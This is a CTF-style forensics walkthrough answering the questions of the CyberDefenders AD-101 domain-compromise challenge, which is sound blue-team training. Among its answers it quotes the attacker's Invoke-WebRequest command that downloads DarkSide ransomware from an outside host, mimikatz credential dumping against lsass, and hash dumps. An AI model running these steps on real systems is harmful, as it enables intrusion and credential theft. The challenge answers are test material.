
Intro

CyberDefenders.org hosted a challenging Windows domain compromise challenge: an Active Directory compromise case in which adversaries were able to take over the corporate domain controller. You, the challenger/IR team, have to investigate the case and reveal the Who, When, What, Where, Why, and How.

For those who don't know CyberDefenders, they host a platform dedicated to training blue team skills (incident response, digital forensics, security analysis, etc.). If you are used to VulnHub and Hack The Box, those services are typically geared more towards red teaming and penetration testing. This is where CyberDefenders stands out!

Walkthrough

This is currently a partial write-up, due to limited time. We will update this post accordingly in the near future!

1) What is the OS Product name of PC01?

Hint:

  • Registry
  • SOFTWARE Hive
  • Microsoft\Windows NT\CurrentVersion

Answer:

Windows 10 Enterprise 2016 LTSB 

2) On 21st November, there was unplanned power off for PC01 machine. How long was PC01 powered on till this shutdown?

Hint:

  • Windows Event logs
  • System

Answer:

11:31

3) Who was the last logged-in user on PC01?

vol.py -f memory.dmp windows.envars.Envars|grep USERNAME
...
3140	svchost.exe	0x9f19e0	USERNAME	0xMohammed
...

Answer:

0xMohammed

4) What is the IP address of PC01?

Hint:

  • Registry
  • SYSTEM Hive
  • \CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

Answer:

192.168.112.142

5) Which port was assigned to man service on PC01?

Hint:

  • Windows/System32/drivers/etc/services

Answer:

9535

6) What is the “Business.xlsx” LogFile Sequence Number?

Parse the MFT:

46494C45 30000300 BC82C754 00000000 03000200 38000100 D8010000 00040000 
00000000 00000000 06000000 2ECE0300 25000000 00000000 10000000 60000000 
00000000 00000000 48000000 18000000 BB5962C0 D8DFD701 942210BB D8DFD701 
C3A8DAC3 D8DFD701 BB5962C0 D8DFD701 20000000 00000000 00000000 00000000 
00000000 A9040000 00000000 00000000 C080AC3B 00000000 30000000 78000000 
00000000 00000500 5A000000 18000100 00600100 00000200 BB5962C0 D8DFD701 
942210BB D8DFD701 A6F227BB D8DFD701 BB5962C0 D8DFD701 00200000 00000000 
DE1F0000 00000000 20000000 00000000 0C024200 55005300 49004E00 45007E00 
31002E00 58004C00 53000000 00000000

The 8 bytes at offset 0x08 of the FILE record header (BC82C754 00000000) are the $LogFile Sequence Number, stored little-endian; converted to an integer…

Answer:

1422361276
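To show where that number comes from, here is an added example (our own code, not part of the original write-up or of any CyberDefenders tooling) that decodes the fixed 48-byte header of the FILE record shown above. The hex dump is the page's own; the field layout is the standard NTFS FILE record header, and the LSN is simply the little-endian 64-bit value at offset 0x08.

```python
import struct

# First 48 bytes (0x30) of the Business.xlsx FILE record, copied from the hex
# dump in the write-up; this is the fixed-size MFT record header.
MFT_RECORD_HEX = (
    "46494C45 30000300 BC82C754 00000000 03000200 38000100 D8010000 00040000 "
    "00000000 00000000 06000000 2ECE0300"
)

# NTFS FILE record header (all fields little-endian):
#   0x00 magic "FILE"             0x04 update-sequence offset   0x06 update-sequence count
#   0x08 $LogFile sequence number 0x10 sequence number          0x12 hard-link count
#   0x14 first attribute offset   0x16 flags (1 = in use, 2 = directory)
#   0x18 used size                0x1C allocated size           0x20 base record reference
#   0x28 next attribute id        0x2A padding                  0x2C MFT record number
HEADER_FMT = "<HHQHHHHIIQHHI"              # everything after the 4-byte magic
HEADER_LEN = 4 + struct.calcsize(HEADER_FMT)  # 48 bytes


def parse_mft_record_header(data: bytes) -> dict:
    """Decode the fixed header of one MFT FILE record into named fields."""
    if len(data) < HEADER_LEN:
        raise ValueError(f"need at least {HEADER_LEN} bytes, got {len(data)}")
    if data[:4] != b"FILE":
        raise ValueError(f"bad record signature {data[:4]!r}, expected b'FILE'")
    (usa_offset, usa_count, lsn, seq_no, link_count, attr_offset, flags,
     used_size, alloc_size, base_ref, next_attr_id, _pad, record_no) = \
        struct.unpack_from(HEADER_FMT, data, 4)
    return {
        "lsn": lsn,                         # $LogFile Sequence Number (question 6)
        "sequence_number": seq_no,
        "hard_links": link_count,
        "first_attribute_offset": attr_offset,
        "in_use": bool(flags & 0x1),
        "is_directory": bool(flags & 0x2),
        "used_size": used_size,
        "allocated_size": alloc_size,
        "base_record": base_ref,
        "next_attribute_id": next_attr_id,
        "record_number": record_no,
        "update_sequence": (usa_offset, usa_count),
    }


def lsn_from_hexdump(dump: str) -> int:
    """Hex dump text as copied from a viewer (spaces allowed) -> LSN."""
    return parse_mft_record_header(bytes.fromhex(dump))["lsn"]


if __name__ == "__main__":
    header = parse_mft_record_header(bytes.fromhex(MFT_RECORD_HEX))
    for name, value in header.items():
        print(f"{name:>24}: {value}")
    print("LSN as hex:", hex(header["lsn"]))
```

The same parser also tells you the record number (0x2ECE0300 little-endian, i.e. MFT entry 249390) and that the entry is in use and not a directory, which is a quick sanity check that you carved the right record before trusting the LSN.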

7) What is the GUID of the C drive on PC01 machine?

Notes:

Windows Registry → SYSTEM hive → MountedDevices, C: gives 8cf4cfff-49a3-11ec-910f-806e6f6e6963, but that is not the accepted answer.

USB forensics gives fad905b3-fb35-4dbd-ab31-a44f022809d2.

Answer:

fad905b3-fb35-4dbd-ab31-a44f022809d2

8) What link did the user visit on 2021-11-22 at 19:45:55 UTC?

Hint:

  • make sure you note the correct address; one of the addresses is a typo
  • Firefox forensics
  • places.sqlite
  • moz_places

Answer:

bluedemy.cyberdefenders.org

9) How many bytes were received by Firefox?

Hint:

  • https://github.com/markmckinnon/Autopsy-Plugins/releases/tag/1.3

Answer:

20418287

10) What is the folder name where note.txt resides?

? someone else worked this out as …

Answer:

asd

11) Which volatility 2 profile should be used to analyze the memory image?

Answer:

Win2016x64_14393

12) Analyzing the memory what is the physical address of the SOFTWARE registry hive?

Answer:

0x00000000040f7000

13) What is the master key of the user “0xMohammed”?

Hint:

  • Windbg (as admin)
  • Mimilib.dll

0: kd> !analyze -v
0: kd> .load c:\Users\user\Desktop\mimilib.dll
0: kd> !process 0 0 lsass.exe
PROCESS ffffba033ef746c0
    SessionId: 0  Cid: 02a0    Peb: 352af59000  ParentCid: 021c
    DirBase: 107683000  ObjectTable: ffff860c09526000  HandleCount: <Data Not Accessible>
    Image: lsass.exe

0: kd> .process /r /p ffffba033ef746c0
Implicit process is now ffffba03`3ef746c0
Loading User Symbols
................................................................
........................................................
0: kd> !mimikatz

Answer:

1652c67aa6719519492e67d1b39cab91e7804eb26b259ff351b60df34ee808804314cbfbcf03afbf3bae3ef2790f2c363ca0a9c8791e0e80d490c26afe77c3be 

13) Using the provided word list, what is the password of the user “0xMohammed”?

Memory analysis and disk extraction?

samdump2  /tmp/SYSTEM /tmp/SAM 
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
0xMohammed:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

They all show 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of an empty password, so the SAM dump gives us nothing (this is most likely the known limitation of older samdump2 builds, which print the empty hash for every account on the AES-encrypted SAM format used by Windows 10 1607 and later).

Grep and search the file for something that stands out?

Hint:

  • grepping the password file
  • grep -iE '^.{10}!' ~/Downloads/AD-101/wordlist.txt   (the -E is needed, otherwise {10} is taken literally by grep's basic regex)

Hint:

  • Windbg (as admin) with Mimilib.dll: the same !mimikatz session against lsass.exe as in question 13

Answer:

0xmohammed!

14) What is the name of the first malware detected by Windows Defender?

Hint:

  • EventID: 1116

Answer:

Exploit:Win32/ShellCode.BN

15) Provide the date and time when the attacker clicked send (submitted) the malicious email?

Answer:

12/08/2021 04:47:48 AM

16) What is the IP address and port on which the attacker received the reverse shell? IP:PORT

Hint:

  • olevba
  • pcode
  • run the sample in a sandbox

Answer:

192.168.112.128:8080

17) Analyzing the reverse shell. What is the first argument given to InternetErrorDlg API?

Hint:

  • olevba
  • pcode

Answer:

11223344

18) What is the MITRE ID of the technique used by the attacker to achieve persistence?

Answer:

T1053.005 (Scheduled Task)

19) What is the attacker’s C2 domain name?

Answer:

c2.cyberdefenders.org

20) What is the name of the tool used by the attacker to collect AD information?

Hint:

  • Windows Event logs
  • Powershell
  • Invoke-ACL.ps1

Answer:

bloodhound

21) What is the PID of the malicious process?

Hint:

  • volatility malfind

Answer:

3140

22) What is the family of the ransomware?

Answer:

darkside

23) What is the command invoked by the attacker to download the ransomware?

Answer:

Invoke-WebRequest http://192.168.112.128:8000/svchost.exe -OutFile svchost.exe

24) Provide the number of ransomware process’ privileges that are enabled by default?

python vol.py -f ~/Downloads/AD-101/AD-MEM/memory.dmp --profile=Win2016x64_14393 privs -p 3140

Note: privs lists 34 privileges, but only those whose attributes include both Default and Enabled are counted.

Answer:

25
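The counting rule above is easy to get wrong by eye, so here is an added example (our own code, not from the write-up or from Volatility) that parses text in the column layout of the Volatility 2 privs plugin and counts the rows that carry both Default and Enabled. The sample output is constructed for illustration, not the real output for PID 3140, so its counts do not reproduce the answer 25; the more useful list for triage is the last one, privileges that are enabled but not default, since those were turned on at runtime by the process itself.

```python
import re

# Constructed sample in the column layout of Volatility 2's "privs -p <pid>"
# output (NOT the real output from the challenge image; counts are illustrative).
SAMPLE_PRIVS_OUTPUT = """\
Volatility Foundation Volatility Framework 2.6.1
Pid      Process          Value  Privilege                      Attributes                     Description
-------- ---------------- ------ ------------------------------ ------------------------------ -----------
    3140 svchost.exe           2 SeCreateTokenPrivilege         Present                        Create a token object
    3140 svchost.exe           3 SeAssignPrimaryTokenPrivilege  Present                        Replace a process-level token
    3140 svchost.exe           5 SeIncreaseQuotaPrivilege       Present,Enabled,Default        Increase quotas
    3140 svchost.exe           8 SeSecurityPrivilege            Present,Enabled,Default        Manage auditing and security log
    3140 svchost.exe          10 SeLoadDriverPrivilege          Present,Enabled                Load and unload device drivers
    3140 svchost.exe          17 SeBackupPrivilege              Present,Enabled,Default        Backup files and directories
    3140 svchost.exe          20 SeDebugPrivilege               Present,Enabled                Debug programs
    3140 svchost.exe          23 SeChangeNotifyPrivilege        Present,Enabled,Default        Receive notifications of changes to files or directories
    3140 svchost.exe          30 SeImpersonatePrivilege         Present,Enabled,Default        Impersonate a client after authentication
    3140 svchost.exe          35 SeTrustedCredManAccessPrivilege                               Access Credential Manager as a trusted caller
"""

# One privilege row: pid, process, value, privilege name, then an optional
# comma-separated attribute list. Banner, header and separator lines don't match.
PRIV_LINE = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<process>\S+)\s+(?P<value>\d+)\s+(?P<priv>Se\w+)"
    r"(?:\s+(?P<attrs>(?:Present|Enabled|Default)(?:,(?:Present|Enabled|Default))*))?"
)


def parse_privs(output):
    """Return one dict per privilege row with Present/Enabled/Default flags."""
    rows = []
    for line in output.splitlines():
        m = PRIV_LINE.match(line)
        if not m:
            continue
        attrs = set(m.group("attrs").split(",")) if m.group("attrs") else set()
        rows.append({
            "pid": int(m.group("pid")),
            "privilege": m.group("priv"),
            "present": "Present" in attrs,
            "enabled": "Enabled" in attrs,
            "default": "Default" in attrs,
        })
    return rows


def count_default_enabled(rows):
    """What question 24 asks for: privileges that are both Enabled and Default."""
    return sum(1 for r in rows if r["enabled"] and r["default"])


def explicitly_enabled(rows):
    """Enabled but not enabled by default: turned on at runtime, worth a second look."""
    return [r["privilege"] for r in rows if r["enabled"] and not r["default"]]


if __name__ == "__main__":
    rows = parse_privs(SAMPLE_PRIVS_OUTPUT)
    print(len(rows), "privileges listed")
    print(count_default_enabled(rows), "enabled by default")
    print("explicitly enabled:", explicitly_enabled(rows))
```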

25) What is the pool tag of the ransomware process?

python vol.py -f ~/Downloads/AD-101/AD-MEM/memory.dmp --profile=Win2016x64_14393 psxview |grep 3140
Volatility Foundation Volatility Framework 2.6.1
0x0000000022e48800 svchost.exe            3140 True   False  True     False  True  True    False 

Wrong; use vaddump instead:

python vol.py -f ~/Downloads/AD-101/AD-MEM/memory.dmp --profile=Win2016x64_14393 vaddump -p 3140 --dump-dir AD101
Volatility Foundation Volatility Framework 2.6.1
Pid        Process              Start              End                Result
---------- -------------------- ------------------ ------------------ ------
      3140 svchost.exe          0x00000000606e0000 0x0000000060731fff AD101/svchost.exe.22e46800.0x00000000606e0000-0x0000000060731fff.dmp

Pool header = object offset - cbDataOffsetPoolHdr (0x5c + 0x4 = 0x60):
0x0000000022e46800 - 0x60 = 0x22E467A0

dt("_POOL_HEADER",0x22E467A0, space=addrspace().base)
[_POOL_HEADER _POOL_HEADER] @ 0x22E467A0
0x0   : PoolIndex                      0
0x0   : PreviousSize                   2
0x0   : Ulong1                         42336258
0x2   : BlockSize                      134
0x2   : PoolType                       2
0x4   : PoolTag                        1280133197

1280133197 in hex is 0x4c4d484d. The tag is stored little-endian in memory, so swap the byte order: 4d 48 4d 4c.

Decoded as ASCII, that is MHML.

Answer:

MHML
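The hex/swap/ASCII steps above are the kind of thing that is worth scripting once. Below is an added example (our own code, not from the write-up or from Volatility) that takes the values volshell printed for the _POOL_HEADER and splits the packed Ulong1 bitfields and the tag; it also decodes the same header from raw bytes, which shows why the tag reads as MHML directly in a hex dump but needs a byte swap when printed as an integer. The 0x60 distance between header and object is taken from the page's own arithmetic; the bitfield layout is the x64 _POOL_HEADER (PreviousSize:8, PoolIndex:8, BlockSize:8, PoolType:8, then the 4-byte tag), and the paged/non-paged reading of the low PoolType bit is our interpretation.

```python
import struct

# Values reported by volshell's dt("_POOL_HEADER", 0x22E467A0, ...) in the write-up
ULONG1 = 42336258            # packed PreviousSize / PoolIndex / BlockSize / PoolType
POOL_TAG_VALUE = 1280133197  # PoolTag as an integer
EPROCESS_OFFSET = 0x22E46800 # from the vaddump file name
POOL_HEADER_DELTA = 0x60     # header sits 0x60 bytes before the object (page's arithmetic)
POOL_GRANULARITY = 16        # x64 pool allocations are sized in 16-byte units


def pool_header_address(object_offset, delta=POOL_HEADER_DELTA):
    """Physical offset of the _POOL_HEADER that precedes an object."""
    return object_offset - delta


def pool_tag_to_string(tag_value):
    """Integer PoolTag -> 4-char tag; packing little-endian does the byte swap."""
    return struct.pack("<I", tag_value).decode("latin-1")


def decode_pool_header(ulong1, tag_value, granularity=POOL_GRANULARITY):
    """Split _POOL_HEADER.Ulong1 into its four byte-wide fields and decode the tag."""
    previous_size = ulong1 & 0xFF
    pool_index = (ulong1 >> 8) & 0xFF
    block_size = (ulong1 >> 16) & 0xFF
    pool_type = (ulong1 >> 24) & 0xFF
    return {
        "previous_size": previous_size,
        "pool_index": pool_index,
        "block_size": block_size,                    # in granularity units
        "block_bytes": block_size * granularity,     # header + object, in bytes
        "pool_type": pool_type,
        "paged": bool(pool_type & 1),                # low bit set = paged pool (our reading)
        "tag": pool_tag_to_string(tag_value),
    }


def decode_pool_header_bytes(raw):
    """Same decode starting from the first 8 raw bytes of a _POOL_HEADER."""
    ulong1, tag_value = struct.unpack_from("<II", raw, 0)
    return decode_pool_header(ulong1, tag_value)


if __name__ == "__main__":
    print("pool header at", hex(pool_header_address(EPROCESS_OFFSET)))
    for name, value in decode_pool_header(ULONG1, POOL_TAG_VALUE).items():
        print(f"{name:>14}: {value}")
    # Constructed: how the same header looks as raw bytes in a hex dump
    raw = struct.pack("<II", ULONG1, POOL_TAG_VALUE)
    print("raw bytes:", raw.hex(" "), "->", decode_pool_header_bytes(raw)["tag"])
```

The raw form is `02 00 86 02 4d 48 4d 4c`: the tag bytes are already in reading order, and the integer 0x4c4d484d only appears reversed because volshell printed a little-endian ULONG. A BlockSize of 134 units is 2144 bytes, which is consistent with a header plus an _EPROCESS allocation on this profile.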

26) What is the address where the ransomware stored the 567-byte key under the malicious process’ memory?

Run strings on the malicious process dump to identify the ransom message and the key.

key:

lsJTyyTnzJlGQ1I6sfwV6oVcXaRyn...
python vol.py --plugins=volatility-firefox -f ~/Downloads/AD-101/AD-MEM/memory.dmp --profile=Win2016x64_14393 yarascan -p 3140 -Y "lsJTyyTn..."
Volatility Foundation Volatility Framework 2.6.1
Rule: r1
Owner: Process svchost.exe Pid 3140
0x00b5f4a5  6c 73 4a 54 79 79 54 6e 7a 4a 6c 47 51 31 49 36   lsJTyyTnzJlGQ1I6
0x00b5f4b5  73 66 77 56 36 6f 56 63 58 61 52 79 6e 77 4e 36   sfwV6oVcXaRynwN6
0x00b5f4c5  6d 57 70 68 41 37 42 4b 58 45 44 49 48 4a 63 44   mWphA7BKXEDIHJcD

Answer:

0x00b5f4a5

27) What is the 8-byte word hidden in the ransomware process’s memory?

Hint:

  • Process Heaps
  • proc().Peb.ProcessHeaps.dereference()
  • db(65536)

Answer:

c0n6r475

28) What is the virtual address of the device where the ransomware file was opened?

First use filescan to find the address of the file:

  • 0xba033f477bc0

Then use volshell:

dt('_FILE_OBJECT' ,0xffffba033f477bc0)

Answer:

0xffffba033e631460

29) What is the physical address where the ransomware file is stored in memory?

python vol.py -f ~/Downloads/AD-101/AD-MEM/memory.dmp --profile=Win2016x64_14393 yarascan -p 3140 -Y "----------- [ Welcome to DarkSide ] "
Volatility Foundation Volatility Framework 2.6.1
Rule: r1
Owner: Process svchost.exe Pid 3140
0x00b5efb0  2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 5b 20 57 65   -----------.[.We
0x00b5efc0  6c 63 6f 6d 65 20 74 6f 20 44 61 72 6b 53 69 64   lcome.to.DarkSid
0x00b5efd0  65 20 5d 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   e.].------------
0x00b5efe0  2d 3e 20 0d 0a 20 20 0d 0a 20 57 68 61 74 20 68   ->........What.h
0x00b5eff0  61 70 70 65 6e 64 3f 20 0d 0a 20 2d 2d 2d 2d 2d   append?....-----
0x00b5f000  2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ----------------
0x00b5f010  2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d   ----------------
0x00b5f020  2d 2d 2d 2d 2d 2d 2d 2d 2d 20 0d 0a 20 59 6f 75   ---------....You
0x00b5f030  72 20 63 6f 6d 70 75 74 65 72 73 20 61 6e 64 20   r.computers.and.
0x00b5f040  73 65 72 76 65 72 73 20 61 72 65 20 65 6e 63 72   servers.are.encr
0x00b5f050  79 70 74 65 64 2c 20 62 61 63 6b 75 70 73 20 61   ypted,.backups.a
0x00b5f060  72 65 20 64 65 6c 65 74 65 64 2e 20 57 65 20 75   re.deleted..We.u
0x00b5f070  73 65 20 73 74 72 6f 6e 67 20 65 6e 63 72 79 70   se.strong.encryp
0x00b5f080  74 69 6f 6e 20 61 6c 67 6f 72 69 74 68 6d 73 2c   tion.algorithms,
0x00b5f090  20 73 6f 20 79 6f 75 20 63 61 6e 6e 6f 74 20 64   .so.you.cannot.d
0x00b5f0a0  65 63 72 79 70 74 20 79 6f 75 72 20 64 61 74 61   ecrypt.your.data

Neither 0x00b5efb0 nor one byte earlier (the readme often starts with a form feed/CR) was accepted. That is a virtual address inside the process anyway, and the question asks for the physical address of the file.

Filescan

  • Back to using filescan to find the actual file: 0xba033f477bc0
  • Convert virtual to physical using volshell:

addrspace().vtop(0xba033f477bc0)

Answer:

0x13c090bc0

30) What is the ransomware file’s internal name?

Answer:

calimalimodumator.exe

31) Analyzing the ransomware file, what is the API used to get the geographical location?

Hint:

  • dump the memory of the malicious process
  • strings 3140.dmp

Answer:

GetLocaleInfoA
